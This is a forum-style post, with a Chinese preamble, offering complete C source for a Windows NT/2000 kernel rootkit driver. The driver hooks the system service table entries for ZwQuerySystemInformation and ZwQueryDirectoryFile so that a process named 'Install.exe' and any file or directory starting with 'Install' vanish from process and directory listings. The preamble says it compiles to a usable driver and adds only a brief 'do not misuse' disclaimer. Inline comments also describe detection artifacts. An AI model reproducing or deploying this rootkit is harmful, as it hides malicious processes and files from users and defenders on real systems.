最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来, 重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏, 隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的 情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多. 程序用于实验,请勿非法使用

//////////////////////////////////////////////////////////////////////////////////////
//
// FileName : D:\Temp\Hide\Driver.c
// Version : 1.0
// Creater : QinzhiMing
// Date : 2002:2:25 14:42
// Comment :
//
//////////////////////////////////////////////////////////////////////////////////////
//
// Kernel-mode driver for NT/2000 that hides one process (by image name) and any
// directory entry whose name starts with a fixed prefix. It does so by overwriting
// two system-service table entries (ZwQuerySystemInformation and
// ZwQueryDirectoryFile) with wrappers that call the original service and then edit
// the returned buffer. Nothing is removed from the kernel's own structures; only
// the results handed back to callers are filtered.
//
// Artifacts a defender can look for, all visible in this file: a device object
// named \Device\Hide with symbolic link \DosDevices\Hide, and two service-table
// entries that no longer point at their original handlers (the table is reached
// through the SYSTEMSERVICE macro from Driver.h, which is not shown here). Because
// only user-visible enumeration is edited, a cross-view comparison (live listing
// versus an independent kernel or offline view) exposes the hidden objects.

#include 'ntddk.h'
#include 'Driver.h'
#include 'stdio.h'

/////////////////////////////////////////////////////////////////////////////
char g_szHideProcName[] = 'Install.exe';   // image name of the process to hide (full-name, case-insensitive match below)
WCHAR g_wszHideFileName[] = L'Install';    // directory entries whose first 7 WCHARs equal this are hidden (prefix match)
ULONG g_nProcessNameOffset;                // byte offset of the image-name field inside EPROCESS, located by scanning at load
BOOL g_hide_proc = TRUE;                   // assigned here but never read anywhere in this file

/////////////////////////////////////////////////////////////////////////////
// Driver entry point: creates the control device and its DOS symbolic link,
// routes every IRP major function to OnDriverDispatch, locates the process-name
// offset and installs the two service-table hooks.
// Returns STATUS_SUCCESS, or the failing IoCreateDevice/IoCreateSymbolicLink status
// (the device is deleted again if the link cannot be created).
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)
{
    int i;
    NTSTATUS ntStatus;
    PDEVICE_OBJECT pDeviceObject;
    WCHAR wchrDeviceName[] = L'\\Device\\Hide';
    WCHAR wchrDeviceLinkName[] = L'\\DosDevices\\Hide';
    UNICODE_STRING wszDeviceName;
    UNICODE_STRING wszDeviceLinkName;

    RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);
    // 0x00008000 is a custom device type in the vendor-defined range, not one of the FILE_DEVICE_* constants.
    ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);
    if (ntStatus != STATUS_SUCCESS)
        goto Exit0;
    RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
    ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);
    if (ntStatus != STATUS_SUCCESS) {
        IoDeleteDevice(pDeviceObject);
        goto Exit0;
    }
    // Every IRP type is accepted and completed with success by OnDriverDispatch.
    for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
        pDriverObject->MajorFunction[i] = OnDriverDispatch;
    pDriverObject->DriverUnload = OnDriverUnload;
    // Must run before the hooks: both wrappers rely on g_nProcessNameOffset.
    GetProcessNameOffset();
    HookSysCall();  // hook the system services
Exit0:
    return ntStatus;
}

/////////////////////////////////////////////////////////////////////////////
// Scans the first 3 pages of the current EPROCESS for the bytes "System" and
// records the offset in g_nProcessNameOffset. It is called from DriverEntry,
// where the current process is expected to be the System process, so the hit is
// taken to be the image-name field. The loop has no break, so if the string occurs
// more than once the LAST offset wins; if it never occurs the global stays 0.
void GetProcessNameOffset()
{
    int i;
    PEPROCESS CurrentProc;
    CurrentProc = PsGetCurrentProcess();
    for (i = 0; i < 3 * PAGE_SIZE; i++) {
        if(!strncmp('System', (PCHAR)CurrentProc + i, strlen('System')))
            g_nProcessNameOffset = i;
    }
}

/////////////////////////////////////////////////////////////////////////////
// Copies the current process's image name into pszName.
// pszName: caller buffer; NT_PROCNAMELEN bytes are copied and a terminator is
//   written at index NT_PROCNAMELEN, so it must hold NT_PROCNAMELEN + 1 bytes
//   (both callers pass a PROCNAMELEN-sized array; the relation between the two
//   constants is defined in Driver.h, not visible here).
// Returns TRUE on success, FALSE (with pszName left untouched) when the offset
// was never located. Neither caller in this file checks the return value.
BOOL GetProcessName(PCHAR pszName)
{
    char *pszTempName;
    PEPROCESS CurrentProc;
    if (g_nProcessNameOffset) {
        CurrentProc = PsGetCurrentProcess();
        pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;
        strncpy(pszName, pszTempName, NT_PROCNAMELEN);
        pszName[NT_PROCNAMELEN] = 0;  // strncpy alone does not guarantee termination
        return TRUE;
    }
    return FALSE;
}

/////////////////////////////////////////////////////////////////////////////
// Saves the original service-table entries for ZwQuerySystemInformation and
// ZwQueryDirectoryFile into OldZw* (declared outside this file, presumably in
// Driver.h) and overwrites the entries with the wrappers below. SYSTEMSERVICE is a
// Driver.h macro that resolves to the table slot; the write is bracketed by
// cli/sti on the executing CPU.
void HookSysCall()
{
    OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
    OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
    _asm cli;
    (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;
    (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;
    _asm sti;
}

/////////////////////////////////////////////////////////////////////////////
// Restores the two service-table entries saved by HookSysCall. Called from
// OnDriverUnload.
void UnHookSysCall()
{
    _asm cli;
    (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
    (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;
    _asm sti;
}

/////////////////////////////////////////////////////////////////////////////
// Replacement for ZwQuerySystemInformation. Calls the original service and, for
// information class 5 (SystemProcessInformation), unlinks every entry whose
// ProcessName equals g_szHideProcName (case-insensitive) by folding its
// NextEntryDelta into the previous entry. The list is walked with goto labels
// (Loop / Next / Exit0) rather than a loop statement.
// Behaviour worth knowing when reading the code:
//  - the caller's own process is exempt: if the current process's name begins
//    with g_szHideProcName, the results are returned unfiltered;
//  - szProcessName is only written when GetProcessName succeeds; its return value
//    is not checked before the memcmp;
//  - entries whose converted name is empty or >= 255 bytes are skipped;
//  - when the matching entry is the FIRST one, only the local copy of the
//    SystemInformation pointer is advanced, which has no effect on the caller.
// Returns the status of the original call.
NTSTATUS NewZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength)
{
    NTSTATUS ntStatus;
    CHAR szProcessName[PROCNAMELEN];
    ANSI_STRING astrProcName;
    ANSI_STRING astrHideProcName;
    struct SYSTEM_PROCESS *Curr;
    struct SYSTEM_PROCESS *Prev;

    RtlInitAnsiString(&astrHideProcName, g_szHideProcName);
    GetProcessName(szProcessName);
    ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(
        SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
    if(!NT_SUCCESS(ntStatus))
        goto Exit0;
    // If the current process is the hidden process itself, leave the results untouched.
    if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)
        goto Exit0;
    if (SystemInformationClass != 5)  // 5 == SystemProcessInformation
        goto Exit0;
    Curr = (struct SYSTEM_PROCESS *)SystemInformation;
    Prev = NULL;
Loop:
    if (Curr == NULL)
        goto Exit0;
    // TRUE: the ANSI buffer is allocated and must be released at Next.
    RtlUnicodeStringToAnsiString(&astrProcName, &(Curr->ProcessName), TRUE);
    if ((astrProcName.Length > 0) && (astrProcName.Length < 255))
        ;
    else
        goto Next;
    if (RtlCompareString(&astrProcName, &astrHideProcName, TRUE) != 0)  // TRUE: case-insensitive
        goto Next;
    if (Prev) {
        // Splice Curr out of the list by extending the previous entry's delta.
        if (Curr->NextEntryDelta)
            Prev->NextEntryDelta += Curr->NextEntryDelta;
        else
            Prev->NextEntryDelta = 0;
    } else {
        // Curr is the head; this only moves the local pointer parameter.
        if (Curr->NextEntryDelta)
            (char *)SystemInformation += Curr->NextEntryDelta;
        else
            SystemInformation = NULL;
    }
Next:
    RtlFreeAnsiString(&astrProcName);
    Prev = Curr;
    if (Curr->NextEntryDelta)
        (char *)Curr += Curr->NextEntryDelta;
    else
        Curr = NULL;
    goto Loop;
Exit0:
    return ntStatus;
}

/////////////////////////////////////////////////////////////////////////////
// Dispatch routine for every IRP major function: completes the request with
// STATUS_SUCCESS and no data. The driver exposes no control codes.
NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)
{
    /* PIO_STACK_LOCATION IrpStack;
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IrpStack = IoGetCurrentIrpStackLocation(Irp);*/
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return Irp->IoStatus.Status;
}

/////////////////////////////////////////////////////////////////////////////
// Unload routine: restores the service-table entries, then removes the
// \DosDevices\Hide link and the device object created in DriverEntry.
void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
    WCHAR wchrDeviceLinkName[] = L'\\DosDevices\\Hide';
    UNICODE_STRING wszDeviceLinkName;
    UnHookSysCall();
    RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
    IoDeleteSymbolicLink(&wszDeviceLinkName);
    IoDeleteDevice(pDriverObject->DeviceObject);
}

/////////////////////////////////////////////////////////////////////////////
// Replacement for ZwQueryDirectoryFile. Calls the original service and then
// removes from the returned buffer every entry whose name starts with
// g_wszHideFileName (14 bytes = 7 WCHARs compared, so "Install" and anything
// beginning with it). FileInfoClass is not examined; the buffer is interpreted
// through pDirEntry (dwLenToNext / suName) from Driver.h for every class.
// Processes whose own name starts with "Install" get unfiltered results.
// Removal strategy:
//  - a matching entry in the middle is overwritten by memmoving the remainder
//    of the buffer down over it and the same position is re-examined (continue);
//  - a matching LAST entry is dropped by zeroing the previous entry's delta, or,
//    if it is also the only entry, by returning 0x80000006 (STATUS_NO_MORE_FILES).
// Returns the original status, or STATUS_NO_MORE_FILES in the single-entry case.
NTSTATUS NewZwQueryDirectoryFile(
    IN HANDLE hFile,
    IN HANDLE hEvent OPTIONAL,
    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
    IN PVOID IoApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    OUT PVOID FileInformationBuffer,
    IN ULONG FileInformationBufferLength,
    IN FILE_INFORMATION_CLASS FileInfoClass,
    IN BOOLEAN bReturnOnlyOneEntry,
    IN PUNICODE_STRING PathMask OPTIONAL,
    IN BOOLEAN bRestartQuery)
{
    NTSTATUS ntStatus;
    CHAR szProcessName[PROCNAMELEN];
    BOOL bLastOne;
    int iPos;
    int iLeft;
    pDirEntry pCurrDir;
    pDirEntry pLastDir;

    GetProcessName(szProcessName);  // return value not checked; see GetProcessName
    ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
        hFile, hEvent, IoApcRoutine, IoApcContext, pIoStatusBlock,
        FileInformationBuffer, FileInformationBufferLength, FileInfoClass,
        bReturnOnlyOneEntry, PathMask, bRestartQuery);
    if (!NT_SUCCESS(ntStatus))
        goto Exit0;
    if (memcmp(szProcessName, 'Install', 7) == 0)  // 7-byte prefix, not the full g_szHideProcName
        goto Exit0;
    pCurrDir = (pDirEntry)FileInformationBuffer;
    pLastDir = NULL;
    do {
        bLastOne = !(pCurrDir->dwLenToNext);  // a zero delta marks the final entry
        if (RtlCompareMemory((PVOID)&pCurrDir->suName[0], (PVOID)&g_wszHideFileName[0], 14) == 14) {
            if (bLastOne) {
                if (pCurrDir == (pDirEntry)FileInformationBuffer)
                    ntStatus = 0x80000006;  // STATUS_NO_MORE_FILES: the only entry was hidden
                else
                    pLastDir->dwLenToNext = 0;  // make the previous entry the last one
                break;
            } else {
                // Shift everything after this entry down over it, then re-check the same slot.
                iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;
                iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;
                RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);
                continue;  // jumps to the while test; bLastOne is FALSE here so the loop repeats
            }
        }
        pLastDir = pCurrDir;
        pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );
    } while (!bLastOne);
Exit0:
    return ntStatus;
}